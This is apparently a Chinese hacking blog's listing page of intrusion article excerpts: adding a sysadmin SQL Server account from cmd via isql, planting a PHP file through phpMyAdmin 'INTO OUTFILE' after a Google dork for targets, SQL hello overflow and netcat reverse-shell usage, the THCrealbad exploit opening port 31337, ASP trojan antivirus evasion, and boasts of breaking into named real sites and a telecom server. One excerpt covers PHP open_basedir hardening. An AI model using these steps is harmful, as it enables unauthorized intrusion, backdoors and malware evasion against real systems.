[技术文章] CMD下加sql账号--入侵新手法

这个服务器可以用sql溢出，可惜就是找不到进一步的入侵方法，因而一直也没有拿下来。今天在校盟看到一篇文章，说是在cmd下也可以中入sql账号和密码，方法如下：

echo exec master.dbo.sp_addlogin 'rooto','******' >test.qry
echo exec sp_addsrvrolemember 'rooto','sysadmin' >>test.qry
cmd.exe /c isql -E /U alma /P /i c:\test.qry

看完后立马去试了一下，居然真的成功了，可是由于溢出，服务器的sql服务已经停止，只好等它下次启动时再运行了。不过对我来说，这种加sql账号的方法还是第一次，所以得拿出来记一下，以备以后还有能用得着的时候，呵呵。

查看更多...

Tags: 技术技术 入侵入侵 提权提权 SQLSQL CMDCMD

[提权技术] Mssql Db_owner角色注入直接获得系统权限

相信大家对ASP+MSSQL注入都已经很熟悉了，连一个对SQL语法丝毫不懂的人也可以用NBSI来轻松入侵大量网站。但就算是一个SQL INJECTION高手，如果针对在MSSQL中只有db_owner角色,破不出猜不到网站后台的情况下，好像也无技可施；除了用备份得到shell的这个思路，我在网上实在没有找出更好的入侵办法。不过，备份得到的shell只是理论化的东东，如果一个webshell有20mb的话，你还能用它吗？前不久，我就碰到了这样的一个台湾网站，管理员的密码倒是用NBSi跑了出来，可是用户名因为是繁体的原因在NBSi中成了一堆乱码。我也找到了后台，可只有干瞪眼的份。怎么办？我又扫了它的所有端口，发现开了5900，估计是管理员用了VNC对服务器进行了远程控制。这时，我就有一个思路，能不能把VNC在注册表的加密密码读出来再来破解呢？看我表演吧！

查看更多...

Tags: 提权提权 入侵入侵 网站入侵网站入侵 技术技术

[渗透资料]  新型ASP后门

查看更多...

Tags: 渗透渗透 入侵入侵 跨站跨站 ASPASP ASP后门ASP后门

[服务器安全]  防范php木马

1、防止跳出web目录 （严重采用）


　　首先修改httpd.conf，如果你只允许你的php脚本程序在web目录里操作，还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs，那么在httpd.conf里加上这么几行：

　　php_admin_value open_basedir /usr/local/apache/htdocs

　　这样，如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许，如果错误显示打开的话会提示这样的错误：

查看更多...

Tags: 渗透渗透 入侵入侵 跨站跨站 漏洞漏洞 脚本脚本 服务器安全服务器安全 PHPPHP

[渗透资料]  打造不死的ASP木马的方法

想不到，前几天我才发现，我千辛万苦收集的ASP木马，居然没有几个不被Kill的。 常说养马千日用马一时，可要是连马都养不好，用的时候可就头疼了。众多杀软中，查杀效果比较好厉害的就是瑞星跟NOD32（测试软件:瑞星2006、卡巴斯基反病毒6.0、Kv2006、 NOD32 AntiVirusv2.51.30和McAfee VirusScan v8.0i）。

来看一下几种比较常见的ASP木马免杀方法

1.加密法

常用的是用微软的源码加密工具screnc.exe，以此来躲开杀毒软件的追杀。优点是见效明显，一般的有害代码用此法加密后，可以存在于服务器上，发挥原有的功能.缺点是代码经过加密后，是不可识别字符，自己也不认识了。

查看更多...

Tags: 渗透渗透 入侵入侵 跨站跨站 漏洞漏洞 脚本脚本

[渗透资料]  站脚本执行漏洞详解

【前言】

本文主要介绍跨站脚本执行漏洞的成因，形式，危害，利用方式，隐藏技巧，解决方法和常
见问题（FAQ），由于目前介绍跨站脚本执行漏洞的资料还不是很多，而且一般也不是很详细
，所以希望本文能够比较详细的介绍该漏洞。由于时间仓促，水平有限，本文可能有不少错
误，希望大家不吝赐教。

声明，请不要利用本文介绍的任何内容，代码或方法进行破坏，否则一切后果自负！

【漏洞成因】
原因很简单，就是因为CGI程序没有对用户提交的变量中的HTML代码进行过滤或转换。

查看更多...

Tags: 渗透渗透 入侵入侵 跨站跨站 漏洞漏洞 脚本脚本

[渗透资料]  跨站入侵*內部共享*

XSS总体介绍
什么是XSS攻击  
XSS又叫CSS   (Cross Site Script) ，跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意用户的特殊目的。XSS属于被动式的攻击，因为其被动且不好利用，所以许多人常呼略其危害性。而本文主要讲的是利用XSS得到目标服务器的shell。技术虽然是老技术，但是其思路希望对大家有帮助。

查看更多...

Tags: 渗透渗透 入侵入侵 跨站跨站 RSSRSS

[检测] 两个比较大的官方站点  [漏洞检测]

今天刚刚接网。。。。郁闷哈。。又不知道该干什么啦。。。无聊闲逛。。。呵呵路过一些站点。。。有点想检测的念头。。。。就这样检测啦。。。不过漏洞全告诉官方管理员了。。。希望他们尽快修补程序出现的漏洞。

漏洞一：易想商务网企业版   易想多用户商城企业版     易想房产网企业版 http://www.changehope.com/
出现轻微安全漏洞。。。。呵呵。。http://changehope.com/ok.htm出现轻微安全漏洞。。。。呵呵。。

漏洞二：飞天论坛官方站点出现。。COOKIE致命的安全漏洞。。。。
http://www.ftbbs.cn/

两个官方站点都被我拿下了。。检测纯属偶然。。。。。漏洞信息就不公布了。。呵呵
承诺过 不公布这两个程序的oday 对不起啦
其实玩漏洞检测蛮好玩的。。呵呵 比写程序好玩多了。。。

Tags: 入侵入侵 日记日记

[入侵]   无意中检测某电信内部服务器(纯属偶然)

呵呵，几天没有几睡好觉了。因为一直在渗透一个服务器。我差不多弄了4天了。目标机器上的一个WEbshell，我在第二天晚上凌晨拿到。然后开始就是去提权服务器。呵呵。。一直弄到现在。4天时间了。一直很忙。都没有提权下。。。试了N多方法哈。。还是依然没有成功。。但是过程收获很多。。让我学到了不少的知识。现在是第四天了。刚才很很累。。。现在却有点兴奋了。。为什么呢。。呵呵。。下文开始。

本来要关机睡觉去了。呵呵。。想到我前天ARP 到一个软件下载站的一个管理后台。登陆看看。呵呵。。提交的新软件还真多。啊。。发现一个软件下载量特大。。想到了什么呢？呵呵。。去日它的下载地址所在的服务器。HOHo..说做就做。。。开始webtool查下。。开始C段麻。。明明知道直接入侵主站服务器是不可能的事情。就c段了。

查看更多...

Tags: 入侵入侵 黑客黑客 网站被入侵网站被入侵 日记日记

[入侵类]    PhpMyAdmin 入侵

google 搜索 Runtime Information inurl:phpmyadmin
1.如何拿到登陆密码. 自己想办法
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(’’);
select cmd from a into outfile ’D:/phpMyAdmin/libraries/d.php’;
Drop TABLE IF EXISTS a;
----end code---

Tags: 网站入侵网站入侵 入侵入侵

[入侵]　各类端口入侵小总结

1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPas*.**e 进行字典暴破（字典是关键）最后 SQLTool*.**e入侵 ============================= 对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口（以上反向的，测试成功） sqlhelloz.exe 入侵ip 1433 （这个是正向连接）

2. 4899端口入侵用4899过滤器.exe，扫描空口令的机器

查看更多...

Tags: 端口入侵端口入侵 入侵入侵

[端口入侵]-对554端口(RealNetworks漏洞)的入侵－THCrealbad

THCREALbad xxx.xxx.xxx.xxx 0

exploit send .... sleeping a while ....

ok ... now try to connect to port 31337 via netcat !

OK。。telnet xxx.xxx.xxx.xxx 31337 (连接31337端口)

查看更多...

Tags: 入侵入侵 端口入侵端口入侵 益出益出 益出工具益出工具